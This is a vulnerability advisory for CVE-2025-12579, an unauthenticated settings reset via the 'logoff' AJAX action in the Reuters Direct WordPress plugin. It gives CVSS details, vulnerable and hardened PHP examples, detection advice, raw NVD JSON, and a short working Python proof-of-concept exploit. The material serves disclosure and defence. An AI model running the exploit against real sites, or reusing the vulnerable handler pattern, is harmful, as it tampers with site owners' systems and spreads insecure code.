Security Vulnerability Report
CVE-2025-12579 CVSS 5.3 MEDIUM

Published: 2025-11-27 03:15:57
Last Modified: 2026-04-15 00:35:42

Description

The Reuters Direct plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'logoff' action in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to reset the plugin's settings.
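The bug class named here (CWE-862, missing authorization) usually shows up in a WordPress plugin as an admin-ajax.php action that is reachable without authentication and changes state without checking the caller's capability. The following is an added illustration of that pattern beside its hardened form; it is hypothetical example code, not the Reuters Direct plugin's source, and the action names, option name and nonce name are assumptions.

```php
<?php
// Added illustration of CWE-862 in a WordPress AJAX handler.
// Hypothetical code, not the Reuters Direct plugin's source; the hook
// names, option name and nonce name below are assumptions.

// --- Vulnerable pattern -----------------------------------------------
// Registering on wp_ajax_nopriv_ exposes the action to unauthenticated
// callers via /wp-admin/admin-ajax.php?action=example_logoff, and the
// callback changes plugin state without asking who is calling.
add_action( 'wp_ajax_example_logoff', 'example_logoff_vulnerable' );
add_action( 'wp_ajax_nopriv_example_logoff', 'example_logoff_vulnerable' );

function example_logoff_vulnerable() {
    delete_option( 'example_plugin_settings' ); // anyone can reset settings
    wp_send_json_success( 'settings cleared' );
}

// --- Hardened pattern -------------------------------------------------
// 1. Register only on wp_ajax_ (logged-in users), never wp_ajax_nopriv_,
//    for an action that modifies plugin settings.
// 2. Require a capability that fits the action (manage_options for
//    site-wide plugin configuration).
// 3. Verify a nonce so a logged-in administrator cannot be made to issue
//    the request from another site (CSRF).
add_action( 'wp_ajax_example_logoff_secure', 'example_logoff_secure' );

function example_logoff_secure() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    // Dies with -1 if the 'nonce' request field does not validate.
    check_ajax_referer( 'example_logoff_nonce', 'nonce' );
    delete_option( 'example_plugin_settings' );
    wp_send_json_success( 'settings cleared' );
}

// The nonce is handed to the plugin's own admin page script, which is
// the only legitimate origin of the request.
function example_enqueue_admin_script() {
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_logoff_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_script' );
```

The capability check is the control the description says is missing; the nonce check is the usual companion, because a capability check alone still lets a logged-in administrator be tricked into triggering the action. For detection, POST requests to admin-ajax.php carrying a state-changing action from clients with no WordPress login cookie are the signal to look for in web server or WAF logs.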

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Reuters Direct plugin for WordPress <= 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-12579 PoC - Reuters Direct Plugin Unauthorized Settings Reset
# Target: WordPress site with Reuters Direct plugin <= 3.0.0
target_url = "http://target-wordpress-site.com"

# Construct the malicious request to trigger the 'logoff' action
# This action resets the plugin settings without authentication
payload = {
    'action': 'logoff'
}

try:
    response = requests.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=payload,
        timeout=10
    )
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    if response.status_code == 200:
        print("[+] PoC executed successfully - Plugin settings may have been reset")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
```

References

https://wordpress.org/plugins/reuters-direct/
https://www.wordfence.com/threat-intel/vulnerabilities/id/4360f293-201c-40c1-9603-931d72cc79bc?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12579",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-27T03:15:57.360",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Reuters Direct plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'logoff' action in all versions up to, and including, 3.0.0. This makes it possible for unauthenticated attackers to reset the plugin's settings."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wordpress.org/plugins/reuters-direct/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4360f293-201c-40c1-9603-931d72cc79bc?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```